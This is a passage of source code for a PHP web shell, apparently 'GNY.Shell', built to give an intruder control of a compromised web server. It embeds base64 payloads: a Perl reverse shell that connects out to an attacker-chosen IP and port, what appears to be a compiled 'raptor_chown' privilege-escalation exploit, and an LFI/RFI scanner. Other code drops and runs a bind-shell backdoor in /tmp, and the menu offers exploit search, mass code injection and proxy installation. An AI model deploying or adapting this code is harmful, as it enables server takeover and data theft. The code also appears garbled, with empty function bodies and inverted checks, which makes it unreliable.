AAAQAAAAIAAAAAhwQIAAcAAAABAAAAAAAAAAAAACAA\r\nAAAAAAAAjwAAAAEAAAADAAAAAJgECAAIAAAMAAAAAAAAAAAAAAAEAAAAAAAAAJUAAAABAAAAAgAA\r\nAAyYBAgMCAAABAAAAAAAAAAAAAAABAAAAAAAAACfAAAABgAAAAMAAAAQmAQIEAgAAMgAAAAFAAAA\r\nAAAAAAQAAAAIAAAAqAAAAAEAAAADAAAA2JgECNgIAAAIAAAAAAAAAAAAAAAEAAAAAAAAAK8AAAAB\r\nAAAAAwAAAOCYBAjgCAAACAAAAAAAAAAAAAAABAAAAAAAAAC2AAAAAQAAAAMAAADomAQI6AgAAAQA\r\nAAAAAAAAAAAAAAQAAAAAAAAAuwAAAAEAAAADAAAA7JgECOwIAAA0AAAAAAAAAAAAAAAEAAAABAAA\r\nAMAAAAAIAAAAAwAAACCZBAggCQAACAAAAAAAAAAAAAAABAAAAAAAAADFAAAAAQAAAAAAAAAAAAAA\r\nIAkAAKgAAAAAAAAAAAAAAAEAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAMgJAADOAAAAAAAAAAAAAAAB\r\nAAAAAAAAAAEAAAACAAAAAAAAAAAAAADQDgAA0AQAABoAAAArAAAABAAAABAAAAAJAAAAAwAAAAAA\r\nAAAAAAAAoBMAANcCAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUgQQIAAAA\r\nAAMAAQAAAAAAKIEECAAAAAADAAIAAAAAAEiBBAgAAAAAAwADAAAAAACQgQQIAAAAAAMABAAAAAAA\r\nYIIECAAAAAADAAUAAAAAAPiCBAgAAAAAAwAGAAAAAAAUgwQIAAAAAAMABwAAAAAARIMECAAAAAAD\r\nAAgAAAAAAFSDBAgAAAAAAwAJAAAAAACcgwQIAAAAAAMACgAAAAAAtIMECAAAAAADAAsAAAAAAFSE\r\nBAgAAAAAAwAMAAAAAADIhgQIAAAAAAMADQAAAAAAAIcECAAAAAADAA4AAAAAAACYBAgAAAAAAwAP\r\nAAAAAAAMmAQIAAAAAAMAEAAAAAAAEJgECAAAAAADABEAAAAAANiYBAgAAAAAAwASAAAAAADgmAQI\r\nAAAAAAMAEwAAAAAA6JgECAAAAAADABQAAAAAAOyYBAgAAAAAAwAVAAAAAAAgmQQIAAAAAAMAFgAA\r\nAAAAAAAAAAAAAAADABcAAAAAAAAAAAAAAAAAAwAYAAAAAAAAAAAAAAAAAAMAGQAAAAAAAAAAAAAA\r\nAAADABoAAQAAAHiEBAgAAAAAAgAMABEAAAAAAAAAAAAAAAQA8f8cAAAA2JgECAAAAAABABIAKgAA\r\nAOCYBAgAAAAAAQATADgAAADomAQIAAAAAAEAFABFAAAACJgECAAAAAABAA8ASQAAACSZBAgBAAAA\r\nAQAWAFUAAACchAQIAAAAAAIADABrAAAA2IQECAAAAAACAAwAEQAAAAAAAAAAAAAABADx/3cAAADc\r\nmAQIAAAAAAEAEgCEAAAA5JgECAAAAAABABMAkQAAAAyYBAgAAAAAAQAQAJ8AAADomAQIAAAAAAEA\r\nFACrAAAApIYECAAAAAACAAwAwQAAAAAAAAAAAAAABADx/9AAAAAAAAAA4AAAABIAAADhAAAAEJgE\r\nCAAAAAARABEA6gAAAACHBAgEAAAAEQAOAPEAAAAAAAAAyQEAABIAAAADAQAAAAAAABQAAAASAAAA\r\nFgEAAACYBAgAAAAAEALx/ycBAAAEmAQIAAAAABECDwA0AQAAYIYECEQAAAASAAwARAEAAAAAAAA0\r\nAAAAEgAAAGABAAAAAAAAZgAAABIAAAByAQAAnIMECAAAAAASAAoAeAEAACCZBAgEAAAAEQAWAIoB\r\nAABUhAQIAAAAABIADACRAQAAAJgECAAAAAAQAvH/pAEAABiGBAhIAAAAEgAMALQBAAAgmQQIAAAA\r\nABAA8f/AAQAABIUECBEBAAASAAwAxQEAAAAAAADVAAAAEgAAAOIBAAAAmAQIAAAAABAC8f/zAQAA\r\nAJgECAAAAAAgAA8A/gEAAMiGBAgAAAAAEgANAAQCAAAAAAAAQwAAABIAAAAWAgAAAJgECAAAAAAQ\r\nAvH/KgIAAAAAAADLAAAAEgAAADoCAAAgmQQIAAAAABAA8f9BAgAA7JgECAAAAAARABUAVwIAACiZ\r\nBAgAAAAAEADx/1wCAAAAmAQIAAAAABAC8f9vAgAABIcECAQAAAARAA4AfgIAAAAAAAAkAAAAEgAA\r\nAJECAAAAmAQIAAAAABAADwCeAgAAAAAAAAAAAAAgAAAAsgIAAACYBAgAAAAAEALx/8gCAAAAAAAA\r\nAAAAACAAAAAAY2FsbF9nbW9uX3N0YXJ0AGNydHN0dWZmLmMAX19DVE9SX0xJU1RfXwBfX0RUT1Jf\r\nTElTVF9fAF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4\r\nAGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBfX0pD\r\nUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAcmFwdG9yX2Nob3duLmMAY2hvd25AQEdMSUJD\r\nXzIuMQBfRFlOQU1JQwBfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZnByaW50ZkBAR0xJQkNfMi4w\r\nAF9fZmluaV9hcnJheV9lbmQAX19kc29faGFuZGxlAF9fbGliY19jc3VfZmluaQBfX2Vycm5vX2xv\r\nY2F0aW9uQEBHTElCQ18yLjAAc3lzdGVtQEBHTElCQ18yLjAAX2luaXQAc3RkZXJyQEBHTElCQ18y\r\nLjAAX3N0YXJ0AF9fZmluaV9hcnJheV9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQA\r\nbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAF9faW5pdF9hcnJheV9lbmQAZGF0YV9z\r\ndGFydABfZmluaQBnZXRnaWRAQEdMSUJDXzIuMABfX3ByZWluaXRfYXJyYXlfZW5kAGV4aXRAQEdM\r\nSUJDXzIuMABfZWRhdGEAX0dMT0JBTF9PRkZTRVRfVEFCTEVfAF9lbmQAX19pbml0X2FycmF5X3N0\r\nYXJ0AF9JT19zdGRpbl91c2VkAHNwcmludGZAQEdMSUJDXzIuMABfX2RhdGFfc3RhcnQAX0p2X1Jl\r\nZ2lzdGVyQ2xhc3NlcwBfX3ByZWluaXRfYXJyYXlfc3RhcnQAX19nbW9uX3N0YXJ0X18A"; $back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0kQVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOw0KcHJpbnQgIlxuXG46OiB3NGNrMW5nLXNoZWxsIChQcml2YXRlIEJ1aWxkIHYwLjMpIHJldmVyc2Ugc2hlbGwgOjpcblxuIjsNCnByaW50ICJcblN5c3RlbSBJbmZvOiAiOyANCnN5c3RlbSgkc3lzdGVtKTsNCnByaW50ICJcbllvdXIgSUQ6ICI7IA0Kc3lzdGVtKCRzeXN0ZW0xKTsNCnByaW50ICJcbkN1cnJlbnQgRGlyZWN0b3J5OiAiOyANCnN5c3RlbSgkc3lzdGVtMik7DQpwcmludCAiXG4iOw0Kc3lzdGVtKCRzeXN0ZW0zKTsgc3lzdGVtKCRzeXN0ZW00KTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; $fi = "\r\nIyEvdXNyL2Jpbi9wZXJsIC13IA0KDQp1c2Ugc3RyaWN0OyANCnVzZSBGaWxlOjpGaW5kOyANCnVzZSBDd2Q7IA0KDQpteSAkc3Rkb3V0Q2hlY2sgPSAwOyANCm15ICRwcm9ncmFtSW5mbyA9IA0KJyANCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIA0KIyAgTG9jYWwgTEZJL1JGSSBTY2FubmVyIGJ5IFJvbW5vdXMgICAgICAgICAgICAgICMgDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tIyANCiMgIFdpbGwgc2NhbiBsb2NhbCBQSFAgZmlsZXMgaW4gZGlyZWN0b3J5ICAgICAgICAjIA0KIyAgcGFzc2VkIGluIHRoZSBmaXJzdCBhcmd1bWVudCB0byB0aGUgc2NyaXB0ICAgICMgDQojICBmb3IgcG9zc2libGUgTEZJL1JGSSB2dWxuZXJhYmlsaXRpZXMuICAgICAgICAgIyANCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIA0KJzsgDQoNCnByaW50ICRwcm9ncmFtSW5mbzsgDQoNCm15ICRwcm9ncmFtVXNhZ2UgPSANCicgDQpVc2FnZTogJyAuICQwIC4gJyBESVJOQU1FICgtdyBmaWxlKSANClVzZSBgLXcgZmlsZWAgYXQgdGhlIGVuZCB0byB3cml0ZSB0byBgZmlsZWAgDQonOyANCg0KbXkgJHNlYXJjaERpcmVjdG9yeSA9ICRBUkdWWzBdOyANCg0KdW5sZXNzICgkc2VhcmNoRGlyZWN0b3J5KSANCnsgDQogIHByaW50ICRwcm9ncmFtVXNhZ2UgYW5kIGRpZSgiXG4iKTsgDQp9IA0KDQpteSAkY3VycmVudERpcmVjdG9yeSA9IGdldGN3ZCAoKTsgDQoNCm91ciAkZGlyZWN0b3J5Q291bnQgPSAwOyANCm91ciAkZmlsZUNvdW50ID0gMDsgDQpvdXIgJHZ1bG5lcmFiaWxpdHlDb3VudCA9IDA7IA0KDQppZiAoJEFSR1ZbMV0gZXEgJy13JykgDQp7IA0KICAkc3Rkb3V0Q2hlY2sgPSAxOyANCiAgb3BlbiAoU1RET1VULCAnPicgLiAkQVJHVlsyXSk7IA0KfSANCg0KZmluZCAoXCZwcm9jZXNzT2JqZWN0LCAiJGN1cnJlbnREaXJlY3RvcnkvJHNlYXJjaERpcmVjdG9yeSIpOyANCg0KJHN0ZG91dENoZWNrID09IDEgPyAocHJpbnQgJ0ZpbmlzaGVkIScgLiAiXG4iKSA6IChwcmludCAiXDAzM1sxbSIgLiAnRmluaXNoZWQhJyAuICJcMDMzWzBtXG4iKTsgDQpwcmludCAnLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0nIC4gIlxuIjsgDQpwcmludCAnRGlyZWN0b3JpZXMgc2Nhbm5lZDogJyAuICRkaXJlY3RvcnlDb3VudCAuICJcbiI7IA0KcHJpbnQgJ0ZpbGVzIHNjYW5uZWQ6ICcgLiAkZmlsZUNvdW50IC4gIlxuIjsgDQpwcmludCAnUG9zc2libGUgdnVsbmVyYWJpbGl0aWVzOiAnIC4gJHZ1bG5lcmFiaWxpdHlDb3VudCAuICJcbiI7IA0KcHJpbnQgJ0V4ZWN1dGlvbiB0aW1lOiAnIC4gKHRpbWUgLSAkXlQpIC4gJyBzZWNvbmQocykuJyAuICJcblxuIjsgDQoNCmlmICgkc3Rkb3V0Q2hlY2spIA0KeyANCiAgY2xvc2UgKFNURE9VVCk7IA0KfSANCg0Kc3ViIHByb2Nlc3NPYmplY3QgDQp7IA0KDQogIGlmICgtZiAkRmlsZTo6RmluZDo6bmFtZSBhbmQgJEZpbGU6OkZpbmQ6Om5hbWUgPX4gbS9cLihwaHRtbHxwaHB8cGhwM3xwaHA0KSQvKSANCiAgeyANCiAgICAkZmlsZUNvdW50Kys7IA0KICAgIG9wZW4gKHBocEZpbGUsICRGaWxlOjpGaW5kOjpuYW1lKSBvciByZXR1cm4gJ1VuYWJsZSB0byBvcGVuIGZpbGUgIicgLiAkRmlsZTo6RmluZDo6bmFtZSAuICciLCBjaGVjayBwZXJtaXNzaW9ucz8nIC4gIlxuIjsgDQogICAgbXkgQGZpbGVTdHJpbmdzID0gPHBocEZpbGU+OyANCiAgICBjbG9zZShwaHBGaWxlKTsgDQogICAgbXkgJHRvdGFsTGluZXMgPSAkI2ZpbGVTdHJpbmdzOyANCiAgICBmb3IgKG15ICRzdHJpbmdDb3VudCA9IDA7ICRzdHJpbmdDb3VudCA8PSAkdG90YWxMaW5lczsgJHN0cmluZ0NvdW50KyspIA0KICAgIHsgDQogICAgICBpZiAoJGZpbGVTdHJpbmdzWyRzdHJpbmdDb3VudF0gPX4gbS8oKD86aW5jbHVkZXxyZXF1aXJlKSg/Ol9vbmNlKT9ccypcKC4qP1wkLio/XCk7KS9naSkgDQogICAgICB7IA0KICAgICAgICAkdnVsbmVyYWJpbGl0eUNvdW50Kys7IA0KICAgICAgICAkc3Rkb3V0Q2hlY2sgPT0gMSA/IChwcmludCAnUG9zc2libGUgdnVsbmVyYWJpbGl0eSBpbiAiJyAuICRGaWxlOjpGaW5kOjpuYW1lIC4gJyIgb24gbGluZSAnIC4gKCRzdHJpbmdDb3VudCArIDEpIC4gJzonIC4gIlxuIikgDQogICAgICAgIDogKHByaW50ICJcMDMzWzFtIiAuICdQb3NzaWJsZSB2dWxuZXJhYmlsaXR5IGluICInIC4gJEZpbGU6OkZpbmQ6Om5hbWUgLiAnIiBvbiBsaW5lICcgLiAoJHN0cmluZ0NvdW50ICsgMSkgLiAnOicgLiAiLlwwMzNbMG1cbiIpOyANCiAgICAgICAgcHJpbnQgIlx0IiAuICQxIC4gIlxuXG4iOyANCiAgICAgIH0gDQogICAgfSANCiAgfSANCiAgaWYgKC1kICRGaWxlOjpGaW5kOjpuYW1lKSANCiAgeyANCiAgICAkZGlyZWN0b3J5Q291bnQrKzsgDQogIH0gDQp9\r\n"; if ( !isset( $_POST['backconnectport'] ) && $_POST['use'] == "shbd" ) { $ip = gethostbyname( $_SERVER['HTTP_HOST'] ); $por = $_POST['backconnectport']; if ( is_writable( "." ) ) { cfb( "shbd", $backdoor ); chmod( "shbd", 511 ); $cmd = "./shbd $por"; exec( "$cmd > /dev/null &" ); $scan = myshellexec( "ps aux" ); if ( eregi( "./shbd $por", $scan ) ) { $data = "\n

Process found running, backdoor setup successfully."; } else if ( eregi( "./shbd $por", $scan ) ) { $data = "\n
Process not found running, backdoor not setup successfully."; } $_POST['backcconnmsg'] = "To connect, use netcat and give it the command 'nc $ip $por'.$data"; } cfb( "/tmp/shbd", $backdoor ); chmod( "/tmp/shbd", 511 ); $cmd = "./tmp/shbd $por"; exec( "$cmd > /dev/null &" ); $scan = myshellexec( "ps aux" ); if ( eregi( "./shbd $por", $scan ) ) { $data = "\n

Process found running, backdoor setup successfully."; } else if ( eregi( "./shbd $por", $scan ) ) { $data = "\n
Process not found running, backdoor not setup successfully."; } $_POST['backcconnmsg'] = "To connect, use netcat and give it the command 'nc $ip $por'.$data"; } if ( !isset( $_POST['backconnectip'] ) && !isset( $_POST['backconnectport'] ) && $_POST['use'] == "Perl" ) { if ( is_writable( "." ) ) { cf( "back", $back_connect ); $p2 = which( "perl" ); $blah = ex( $p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &" ); $_POST['backcconnmsg'] = "Trying to connect to ".$_POST['backconnectip']." on port ".$_POST['backconnectport']."."; if ( file_exists( "back" ) ) { unlink( "back" ); } } cf( "/tmp/back", $back_connect ); $p2 = which( "perl" ); $blah = ex( $p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &" ); $_POST['backcconnmsg'] = "Trying to connect to ".$_POST['backconnectip']." on port ".$_POST['backconnectport']."."; if ( file_exists( "/tmp/back" ) ) { unlink( "/tmp/back" ); } } if ( !isset( $_POST['backconnectip'] ) && !isset( $_POST['backconnectport'] ) && $_POST['use'] == "C" ) { if ( is_writable( "." ) ) { cf( "backc", $back_connect_c ); chmod( "backc", 511 ); $blah = ex( "./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &" ); $_POST['backcconnmsg'] = "Trying to connect to ".$_POST['backconnectip']." on port ".$_POST['backconnectport']."."; if ( file_exists( "backc" ) ) { unlink( "backc" ); } } chmod( "/tmp/backc", 511 ); cf( "/tmp/backc", $back_connect_c ); $blah = ex( "/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &" ); $_POST['backcconnmsg'] = "Trying to connect to ".$_POST['backconnectip']." on port ".$_POST['backconnectport']."."; if ( file_exists( "/tmp/backc" ) ) { unlink( "/tmp/backc" ); } } ini_set( "max_execution_time", 0 ); if ( !function_exists( "getmicrotime" ) ) { } error_reporting( 5 ); $adires = ""; @ignore_user_abort( TRUE ); @set_magic_quotes_runtime( 0 ); $win = strtolower( substr( PHP_OS, 0, 3 ) ) == "win"; define( "starttime", getmicrotime( ) ); if ( get_magic_quotes_gpc( ) ) { if ( !function_exists( "strips" ) ) { } strips( $GLOBALS ); } $_REQUEST = array_merge( $_COOKIE, $_GET, $_POST ); foreach ( $_REQUEST as $k=>$v ) { if ( !isset( $Var_330 ) ) { ${ $k } = $v; } } $shver = "1.3.37"; if ( !isset( $unset_surl ) ) { setcookie( "GNY_surl" ); $surl = ""; } else if ( !isset( $set_surl ) ) { $surl = $set_surl; setcookie( "GNY_surl", $surl ); } else { $surl = $_REQUEST['GNY_surl']; } $surl_autofill_include = TRUE; if ( $surl_autofill_include && !$_REQUEST['GNY_surl'] ) { $include = "&"; foreach ( explode( "&", getenv( "QUERY_STRING" ) ) as $v ) { $v = explode( "=", $v ); $name = urldecode( $v[0] ); $value = urldecode( $v[1] ); foreach ( array( "http://", "https://", "ssl://", "ftp://", "\\\\" ) as $needle ) { if ( strpos( $value, $needle ) === 0 ) { $includestr .= urlencode( $name )."=".urlencode( $value )."&"; } } } if ( $_REQUEST['surl_autofill_include'] ) { $includestr .= "surl_autofill_include=1&"; } } if ( isset( $surl ) ) { $surl = "?".$includestr; } $surl = htmlspecialchars( $surl ); $timelimit = 0; $login = ""; $pass = ""; $md5_pass = ""; $host_allow = array( "*" ); $login_txt = "Restricted area"; $accessdeniedmess = "You cannot access this file directly.
Go Back"; $gzipencode = TRUE; $updatenow = FALSE; $GNY_updateurl = ""; $GNY_sourcesurl = ""; $filestealth = TRUE; $donated_html = ""; $donated_act = array( "" ); $curdir = "./"; $tmpdir = ""; $tmpdir_log = "./"; $log_email = "user@host.tld"; $sort_default = "0a"; $sort_save = TRUE; $ftypes = array( "html"=>array( "html", "htm", "shtml" ), "txt"=>array( "txt", "conf", "bat", "sh", "js", "bak", "doc", "log", "sfc", "cfg", "htaccess", "passwd", "shadow" ), "exe"=>array( "sh", "install", "bat", "cmd" ), "ini"=>array( "ini", "inf" ), "code"=>array( "php", "phtml", "php3", "php4", "inc", "tcl", "h", "c", "cpp", "py", "cgi", "pl" ), "img"=>array( "gif", "png", "jpeg", "jfif", "jpg", "jpe", "bmp", "ico", "tif", "tiff", "avi", "mpg", "mpeg" ), "sdb"=>array( "sdb" ), "phpsess"=>array( "sess" ), "download"=>array( "exe", "com", "pif", "src", "lnk", "zip", "rar", "gz", "tar" ) ); $dizin = str_replace( "\\", DIRECTORY_SEPARATOR, $dizin ); if ( isset( $dizin ) ) { $dizin = realpath( "." ); } else if ( realpath( $dizin ) ) { $dizin = realpath( $dizin ); } $dizin = str_replace( "\\", DIRECTORY_SEPARATOR, $dizin ); if ( substr( $dizin, 0 - 1 ) != DIRECTORY_SEPARATOR ) { $dizin .= DIRECTORY_SEPARATOR; } $dizin = str_replace( "\\\\", "\\", $dizin ); $dizinispd = htmlspecialchars( $dizin ); $real = realpath( $dizinispd ); $path = basename( $PHP_SELF ); $exeftypes = array( getenv( "PHPRC" )." -q %f%"=>array( "php", "php3", "php4" ), "perl %f%"=>array( "pl", "cgi" ) ); $regxp_highlight = array( , array( "config.php", 1 ), array( "settings.php", 1 ), array( "connect.php", 1 ) ); $safemode_diskettes = array( "a" ); $hexdump_lines = 8; $hexdump_rows = 24; $nixpwdperpage = 100; $bindport_pass = "GNY"; $bindport_port = "31373"; $bc_port = "5992"; $datapipe_localport = "8081"; $back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj \r\naG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR \r\nhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT \r\nsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI \r\nkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi \r\nKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl \r\nOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; $sess_cookie = "GNYvars"; $usefsbuff = TRUE; $copy_unset = FALSE; $quicklaunch = array( , array( "[Back]", "javascript:history.back(1)" ), array( "[Forward]", "javascript:history.go(1)" ), array( "[Up]", $surl."act=ls&d=%upd&sort=%sort" ), array( "[Refresh]", "" ), array( "[Search]", $surl."act=search&d=%d" ), array( "[Buffer]", $surl."act=fsbuff&d=%d" ), array( "

[String/Hash Tools]", $surl."act=encoder&d=%d" ), array( "[Processes]", $surl."act=processes&d=%d" ), array( "[Users]", $surl."act=users" ), array( "[System Information]", $surl."act=security&d=%d" ), array( "[SQL Manager]", $surl."act=sql&d=%d" ), array( "[Reverse IP]", $surl."act=rip" ), array( "[Kernel Exploit Search]", $surl."act=exploit" ), array( "[Execute PHP Code]", $surl."act=eval&d=%d" ), array( "[PHP Info]", $surl."act=phpinfo&d=%d" ) ); $quicklaunch2 = array( , array( "[Bind Shell Backdoor]", $surl."act=shbd" ), array( "[Back-Connection]", $surl."act=backc" ), array( "[Mass Code Injection]", $surl."act=massbrowsersploit" ), array( "[Exploits]", $surl."act=exploits" ), array( "[cPanel Finder]", $surl."act=cpanel" ), array( "[RFI/LFI Finder]", $surl."act=fi" ), array( "[Install IP:Port Proxy]", $surl."act=proxy" ), array( "[Install PHP Proxy]", $surl."act=phpproxy" ), array( "[Suicide Script]", $surl."act=selfremove" ) ); $highlight_background = "#c0c0c0"; $highlight_bg = "#FFFFFF"; $highlight_comment = "#6A6A6A"; $highlight_default = "#0000BB"; $highlight_html = "#1300FF"; $highlight_keyword = "#007700"; $highlight_string = "#000000"; $f = $_REQUEST['f']; @extract( $_REQUEST['GNYcook'] ); @set_time_limit( 0 ); $tmp = array( ); foreach ( $host_allow as $k=>$v ) { $Var_681[$tmp] = str_replace( "\\*", ".*", preg_quote( $v ) ); } $s = "!^(".implode( "|", $tmp ).")\$!i"; if ( !preg_match( $s, getenv( "REMOTE_ADDR" ) ) && !preg_match( $s, gethostbyaddr( getenv( "REMOTE_ADDR" ) ) ) ) { exit( ); } if ( !isset( $login ) ) { if ( isset( $md5_pass ) ) { $md5_pass = md5( $pass ); } if ( $_SERVER['PHP_AUTH_USER'] != $login || md5( $_SERVER['PHP_AUTH_PW'] ) != $md5_pass ) { if ( isset( $login_txt ) ) { $login_txt = strip_tags( ereg_replace( " |
", " ", $donated_html ) ); } header( "WWW-Authenticate: Basic realm=\"GNY.Shell ".$shver.": ".$login_txt."\"" ); header( "HTTP/1.0 401 Unauthorized" ); exit( ); } } if ( $act != "img" ) { $lastdir = realpath( "." ); chdir( $curdir ); if ( $selfwrite || $updatenow ) { @ob_clean( ); sh_getupdate( $selfwrite, 1 ); exit( ); } $sess_data = unserialize( $_COOKIE["$sess_cookie"] ); if ( !is_array( $sess_data ) ) { $sess_data = array( ); } if ( !is_array( $sess_data['copy'] ) ) { $sess_data['copy'] = array( ); } if ( !is_array( $sess_data['cut'] ) ) { $sess_data['cut'] = array( ); } $disablefunc = ini_get( "disable_functions" ); if ( !isset( $disablefunc ) ) { $disablefunc = str_replace( " ", "", $disablefunc ); $disablefunc = explode( ",", $disablefunc ); } if ( !function_exists( "buff_prepare" ) ) { } buff_prepare( ); if ( !function_exists( "sess_put" ) ) { } foreach ( array( "sort", "sql_sort" ) as $v ) { if ( !isset( $_GET[$v] ) ) { ${ $v } = $_GET[$v]; } if ( !isset( $_POST[$v] ) ) { ${ $v } = $_POST[$v]; } } if ( $sort_save ) { if ( !isset( $sort ) ) { setcookie( "sort", $sort ); } if ( !isset( $sql_sort ) ) { setcookie( "sql_sort", $sql_sort ); } } if ( !function_exists( "str2mini" ) ) { } if ( !function_exists( "view_size" ) ) { } if ( !function_exists( "fs_copy_dir" ) ) { } if ( !function_exists( "fs_copy_obj" ) ) { } if ( !function_exists( "fs_move_dir" ) ) { } if ( !function_exists( "fs_move_obj" ) ) { } if ( !function_exists( "fs_rmdir" ) ) { } if ( !function_exists( "fs_rmobj" ) ) { } if ( !function_exists( "myshellexec" ) ) { } if ( !function_exists( "tabsort" ) ) { } if ( !function_exists( "view_perms" ) ) { } if ( !function_exists( "posix_getpwuid" ) && !in_array( "posix_getpwuid", $disablefunc ) ) { } if ( !function_exists( "posix_getgrgid" ) && !in_array( "posix_getgrgid", $disablefunc ) ) { } if ( !function_exists( "posix_kill" ) && !in_array( "posix_kill", $disablefunc ) ) { } if ( !function_exists( "parse_perms" ) ) { } if ( !function_exists( "parsesort" ) ) { } if ( !function_exists( "view_perms_color" ) ) { } if ( !function_exists( "getsource" ) ) { } if ( !function_exists( "sh_getupdate" ) ) { } if ( !function_exists( "mysql_dump" ) ) { } if ( !function_exists( "mysql_buildwhere" ) ) { } if ( !function_exists( "mysql_fetch_all" ) ) { } if ( !function_exists( "mysql_smarterror" ) ) { } if ( !function_exists( "mysql_query_form" ) ) { } if ( !function_exists( "mysql_create_db" ) ) { } if ( !function_exists( "mysql_query_parse" ) ) { } if ( !function_exists( "fsearch" ) ) { } if ( $act == "gofile" ) { if ( is_dir( $f ) ) { $act = "ls"; $d = $f; } else { $act = "f"; $d = dirname( $f ); $f = basename( $f ); } } @ob_start( ); @ob_implicit_flush( 0 ); header( "Expires: Mon, 26 Jul 1997 05:00:00 GMT" ); header( "Last-Modified: ".gmdate( "D, d M Y H:i:s" )." GMT" ); header( "Cache-Control: no-store, no-cache, must-revalidate" ); header( "Cache-Control: post-check=0, pre-check=0", FALSE ); header( "Pragma: no-cache" ); if ( isset( $tmpdir ) ) { $tmpdir = ini_get( "upload_tmp_dir" ); if ( is_dir( $tmpdir ) ) { $tmpdir = "/tmp/"; } } $tmpdir = realpath( $tmpdir ); $tmpdir = str_replace( "\\", DIRECTORY_SEPARATOR, $tmpdir ); if ( substr( $tmpdir, 0 - 1 ) != DIRECTORY_SEPARATOR ) { $tmpdir .= DIRECTORY_SEPARATOR; } if ( isset( $tmpdir_logs ) ) { $tmpdir_logs = $tmpdir; } else { $tmpdir_logs = realpath( $tmpdir_logs ); } if ( ini_get( "safe_mode" ) || strtolower( ini_get( "safe_mode" ) ) == "on" ) { $safemode = TRUE; $hsafemode = "ON (secure)"; } else { $safemode = FALSE; $hsafemode = "OFF (not secure)"; } $v = ini_get( "open_basedir" ); if ( $v || strtolower( $v ) == "on" ) { $openbasedir = TRUE; $hopenbasedir = "".$v.""; } else { $openbasedir = FALSE; $hopenbasedir = "OFF (not secure)"; } $sort = htmlspecialchars( $sort ); if ( isset( $sort ) ) { $sort = $sort_default; } $sort[1] = strtolower( $sort[1] ); $DISP_SERVER_SOFTWARE = getenv( "SERVER_SOFTWARE" ); if ( !ereg( "PHP/".phpversion( ), $DISP_SERVER_SOFTWARE ) ) { $DISP_SERVER_SOFTWARE .= ". PHP/".phpversion( ); } $DISP_SERVER_SOFTWARE = str_replace( "PHP/".phpversion( ), "PHP/".phpversion( )."", htmlspecialchars( $DISP_SERVER_SOFTWARE ) ); @ini_set( "highlight.bg", $highlight_bg ); @ini_set( "highlight.comment", $highlight_comment ); @ini_set( "highlight.default", $highlight_default ); 